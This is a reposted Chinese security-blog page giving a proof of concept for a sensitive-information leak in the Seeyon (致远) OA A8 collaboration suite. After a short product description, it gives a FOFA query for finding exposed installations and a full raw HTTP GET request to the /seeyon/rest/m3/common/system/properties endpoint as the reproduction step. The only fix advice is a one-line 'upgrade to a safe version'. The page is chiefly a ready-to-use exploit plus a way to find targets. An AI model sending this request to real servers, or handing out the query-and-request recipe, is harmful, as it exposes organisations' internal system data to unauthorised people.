致远OA rest/m3接口处敏感信息泄露PoC

admin 2024年9月29日15:29:09评论32 views字数 790阅读2分38秒阅读模式

简介

致远OA-A8是由北京致远互联软件股份有限公司(以下简称致远公司)开发的一款协同管理软件,构建了面向中大型、集团组织的数字化协同运营平台。致远OA-A8系统基于组织管理的基础理论设计,支持大型组织的发展和变化,解决了组织结构、业务重组、组织流程再造等结构治理相对应的问题,满足集团战略管控、营运管控和财务管控的战略协同行为和垂直业务管控的要求。
漏洞描述
致远A8+协同管理软件rest/m3/common/system/properties接口处存在敏感信息泄露。
fofa语法
app="致远互联-OA"
漏洞复现
GET /seeyon/rest/m3/common/system/properties HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeCookie: JSESSIONID=36D5AB8F53DCA1CF4BAD03700D24B7C3Upgrade-Insecure-Requests: 1Priority: u=0, i
致远OA rest/m3接口处敏感信息泄露PoC
修复建议
升级到安全版本!!!

 

原文始发于微信公众号(白帽攻防):【漏洞复现】致远OA rest/m3接口处敏感信息泄露

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月29日15:29:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   致远OA rest/m3接口处敏感信息泄露PoChttps://cn-sec.com/archives/3218669.html

发表评论

匿名网友 填写信息